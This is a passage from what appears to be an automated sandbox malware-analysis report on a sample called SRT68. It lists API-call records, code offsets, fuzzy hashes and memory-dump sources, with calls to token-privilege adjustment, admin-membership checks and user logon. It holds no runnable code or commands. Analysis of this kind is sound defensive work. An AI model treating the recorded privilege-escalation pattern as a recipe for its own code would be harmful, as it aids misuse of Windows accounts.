                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: c1d963658a03babd0889a57eb05c98ffc2c1654090f100d8e7d8ab5d5f59e3e4
                                                                      • Instruction ID: 93a38b8675a0c632efaa003dcd20690f2e92d263f3bc1f95a44e2608236fb40b
                                                                      • Opcode Fuzzy Hash: c1d963658a03babd0889a57eb05c98ffc2c1654090f100d8e7d8ab5d5f59e3e4
                                                                      • Instruction Fuzzy Hash: 98217175A00108EFDB00EFA5D881AEEBBB8FF49314F1480A9E945AB355CB359915DB50
                                                                      APIs
                                                                        • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                        • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
                                                                      • GetLastError.KERNEL32 ref: 00FF8865
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1922334811-0
                                                                      • Opcode ID: 71ee924eb328685b82607134fce227d47b6d8915c19c05ce83a1b0c4cc7c4279
                                                                      • Instruction ID: cc4541fdd1177566859c255f19867f3249497925668762d8ec97a995f23bc5d7
                                                                      • Opcode Fuzzy Hash: 71ee924eb328685b82607134fce227d47b6d8915c19c05ce83a1b0c4cc7c4279
                                                                      • Instruction Fuzzy Hash: 2E1190B2814205AFD728DF54DC86D2BB7BCEF04750B20852EF45687201DE34AC41CB60
                                                                      APIs
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FF8774
                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FF878B
                                                                      • FreeSid.ADVAPI32(?), ref: 00FF879B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: 93623aaf9ce7e72fd68d521471ab13f71f6ca9bcf3e92edcba05ab7fdc68af1d
                                                                      • Instruction ID: 196c4cf03c57e68e66ffb3bed332c9bade4faf162af1df3ee70e19a749936297
                                                                      • Opcode Fuzzy Hash: 93623aaf9ce7e72fd68d521471ab13f71f6ca9bcf3e92edcba05ab7fdc68af1d
                                                                      • Instruction Fuzzy Hash: 20F03775A1120DBBDB10DEE49989AAEBBBCEF08211F5044A9EA01E2180E6796A048B50
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0100C6FB
                                                                      • FindClose.KERNEL32(00000000), ref: 0100C72B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: 1ecebf07e25952ff0210c3a5995965dd56c3dc9234a3b2f19809b9055168304e
                                                                      • Instruction ID: f9e2606664d6d792c24e02576c9b45fdc2800d22adeb4888a29862fe1fd269f7
                                                                      • Opcode Fuzzy Hash: 1ecebf07e25952ff0210c3a5995965dd56c3dc9234a3b2f19809b9055168304e
                                                                      • Instruction Fuzzy Hash: 0C11A1726046049FDB10DF29CC45A2AF7E8FF85324F44865DF9A9D7291DB78A805CB81
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,01019468,?,0102FB84,?), ref: 0100A097
                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,01019468,?,0102FB84,?), ref: 0100A0A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: e80a9bbb24e6a3536a99c01e3ac527bce5c990a0002f2a52cc0588bd5a55bcae
                                                                      • Instruction ID: 6cde32cfb1a9291c93bda04c682974366a99fcd48ea5ab13b54ee84b144b69b1
                                                                      • Opcode Fuzzy Hash: e80a9bbb24e6a3536a99c01e3ac527bce5c990a0002f2a52cc0588bd5a55bcae
                                                                      • Instruction Fuzzy Hash: 67F0823520532DBBDB21AEA4CC48FEA776DBF097A1F008156F949D7181D6349544CBA1
                                                                      APIs
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FF8309), ref: 00FF81E0
                                                                      • CloseHandle.KERNEL32(?,?,00FF8309), ref: 00FF81F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: 14d359a8c40a09cfec0ce3c38b97d13d2a425cb9adbd236d46dc166066018089
                                                                      • Instruction ID: 8650d691053d870b973c160b6a5e020fb3e2f85bb3c3de6c7a7fc6e2a4e04428
                                                                      • Opcode Fuzzy Hash: 14d359a8c40a09cfec0ce3c38b97d13d2a425cb9adbd236d46dc166066018089
                                                                      • Instruction Fuzzy Hash: 7EE0BF71010512EEE7352B60EC05E7777A9EF04350B24895DF595C4474DB666C91EB10
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FC8D57,?,?,?,00000001), ref: 00FCA15A
                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FCA163
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 4e0069bf2a1b912cf1254b590949bc1e08707a0516f48d1eff50ca7f136cf740
                                                                      • Instruction ID: c7db986df3a87042823c09eaa46304b7afd2c0f8abbf447ecc89791cb938edfe
                                                                      • Opcode Fuzzy Hash: 4e0069bf2a1b912cf1254b590949bc1e08707a0516f48d1eff50ca7f136cf740
                                                                      • Instruction Fuzzy Hash: C2B0923105420AEBCA202F91E809B883F78EB44AE2F508010F64D84054CBE754508B91
                                                                      Strings
                                                                      • Variable must be of type 'Object'., xrefs: 00FE3E62
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable must be of type 'Object'.
                                                                      • API String ID: 0-109567571
                                                                      • Opcode ID: 5509e694c18a0255459401e24e14f8eb6144df59b5e3b5de948f45ae2486b08b
                                                                      • Instruction ID: 6e729d9a8fd6327aaa937de596b08a7c1498d39dea93df2c32b92daf3320a977
                                                                      • Opcode Fuzzy Hash: 5509e694c18a0255459401e24e14f8eb6144df59b5e3b5de948f45ae2486b08b
                                                                      • Instruction Fuzzy Hash: 49A28DB5E00206CFCB24CF58C484AAEB7B2FF5A324F248069D955AB351D735ED46EB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 70905c5e5a89c6d3f9af74e27eb05e0588551df8c97e79df563039d1c0447e9d
                                                                      • Instruction ID: 4fea84e222a24523393ba61589c6392c58e9fccf3702f440e28380b6dba1438f
                                                                      • Opcode Fuzzy Hash: 70905c5e5a89c6d3f9af74e27eb05e0588551df8c97e79df563039d1c0447e9d
                                                                      • Instruction Fuzzy Hash: C0322272D29F024DD7279534C932335A25DAFB73D4F14C73BE85AB59AAEB29C4835200
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5c333baba1fb4003f05d4d6f3043bc49599edcc30d0a9ef70632a99425d1418a
                                                                      • Instruction ID: 25b7becff4665a5e0b194fa5c32d95634a3e2ca783edef8b4866fdb2d62a19ef
                                                                      • Opcode Fuzzy Hash: 5c333baba1fb4003f05d4d6f3043bc49599edcc30d0a9ef70632a99425d1418a
                                                                      • Instruction Fuzzy Hash: 28B10131E2AF408DD72396398831336B65CAFBB2C5F51D71BFCA6B1D16EB2685835240
                                                                      APIs
                                                                      • __time64.LIBCMT ref: 0100889B
                                                                        • Part of subcall function 00FC520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01008F6E,00000000,?,?,?,?,0100911F,00000000,?), ref: 00FC5213
                                                                        • Part of subcall function 00FC520A: __aulldiv.LIBCMT ref: 00FC5233
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                      • String ID:
                                                                      • API String ID: 2893107130-0
                                                                      • Opcode ID: 53a201c8cda173a25c8cae77ecf3f1841c47eaf01457b24d19925e1a5eae8920
                                                                      • Instruction ID: a744b049d1607cf10e70962d9c40b28320195866b0663cb0716f277ceaaf285f
                                                                      • Opcode Fuzzy Hash: 53a201c8cda173a25c8cae77ecf3f1841c47eaf01457b24d19925e1a5eae8920
                                                                      • Instruction Fuzzy Hash: 9B21AF32A256108BD72ACF29D441A52B3E1EBA5311F288E6DD1F5CB2C0CA35B905CB94
                                                                      APIs
                                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 01004C4A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: mouse_event
                                                                      • String ID:
                                                                      • API String ID: 2434400541-0
                                                                      • Opcode ID: 5467691819165dd9073ab16613d8c14553fc5e259d9b171ca03f362f6370079b
                                                                      • Instruction ID: 8fa64b974c4e784b7a08462fc5a32d4556001ef10bcec07d370e257321aa5607
                                                                      • Opcode Fuzzy Hash: 5467691819165dd9073ab16613d8c14553fc5e259d9b171ca03f362f6370079b
                                                                      • Instruction Fuzzy Hash: 57D05EA516461E78FCEE0B249A2FF7A15C8E3806C2FC081C973C1CA0C1ECC458404138
                                                                      APIs
                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FF8389), ref: 00FF87D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: LogonUser
                                                                      • String ID:
                                                                      • API String ID: 1244722697-0
                                                                      • Opcode ID: 17f7bf759fd015af7081b6465bd93b5611ea961b8ac97a9807667aada95ffe95
                                                                      • Instruction ID: c45ea7ede5db869f9ad6826db7eebdd21c6579e56be73f10a9c1ee6bd5ee0580
                                                                      • Opcode Fuzzy Hash: 17f7bf759fd015af7081b6465bd93b5611ea961b8ac97a9807667aada95ffe95
                                                                      • Instruction Fuzzy Hash: 6DD05E3226050EABEF118EA4DD01EAE3B69EB04B01F808111FE15D5090C77AD835AF60
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FCA12A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: c9e743fecbfe8cd06a60452b098aa1ed48e5c689674fde609cb375137e77a48f
                                                                      • Instruction ID: df8d1cde32827d8a0a777400c8f38732c52cfdf39c54ae69bd9c18336cb79aed
                                                                      • Opcode Fuzzy Hash: c9e743fecbfe8cd06a60452b098aa1ed48e5c689674fde609cb375137e77a48f
                                                                      • Instruction Fuzzy Hash: 72A0113000020EEB8A202E82E808888BFACEA002E0B008020F80C800228BB3A8208A80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df4fd4e3cc4f5131de0e482b52fe08fc65a07666966f9d7d3ece7408127e4d25
                                                                      • Instruction ID: 002a779c53e30318d232a434021657b496e268aa2cddefc306a81a40c710389d
                                                                      • Opcode Fuzzy Hash: df4fd4e3cc4f5131de0e482b52fe08fc65a07666966f9d7d3ece7408127e4d25
                                                                      • Instruction Fuzzy Hash: 55224831D0414ADBDF388A16C4943BD77A9FF817A4F24406AD642CB5A2DB74AC82FF41
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                      • Instruction ID: 1c5189bf15134f41a52023c7b8e432b0353f148dc6f395ec35a4907960b732f9
                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                      • Instruction Fuzzy Hash: 55C1DA326050930AEF5D46398636A3EFBA1AEA37B131A075DD4B3CB1C5EE10C979E650
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                      • Instruction ID: a9662a08dcfd67055497935d93b8215c7e7ba5056ed95b67c277c4ba94e6c1e4
                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                      • Instruction Fuzzy Hash: 2FC1E93360515309EF6D4639C676A3EBAA1AE937B131A035DD4B3CB1C5EE20C978F660
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                      • Instruction ID: 2ba69262dfbd7e423e4fd111d6a8d04fc8aeef342fabb155543453edc4f57627
                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                      • Instruction Fuzzy Hash: 14C1A93260515309EF2D4639C636A3EBBA17EA37B131A075DD4B3CB1C6EE20C979E650
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction ID: f215af0f08b041eaf68abc4941dae94a405734046930b57bbd76f36493fe1694
                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction Fuzzy Hash: 2F41C271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389446945.00000000015AE000.00000040.00000020.00020000.00000000.sdmp, Offset: 015AE000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_15ae000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction ID: 07d61b51aa0d18351697f984324d690fd8b027360d5f6591c14f7f50b87d4f54
                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction Fuzzy Hash: 92019278A00509EFCB84DF98D5D09AEF7F5FB48310F208599D819AB301D730AE41DB80
                                                                      Memory Dump Source
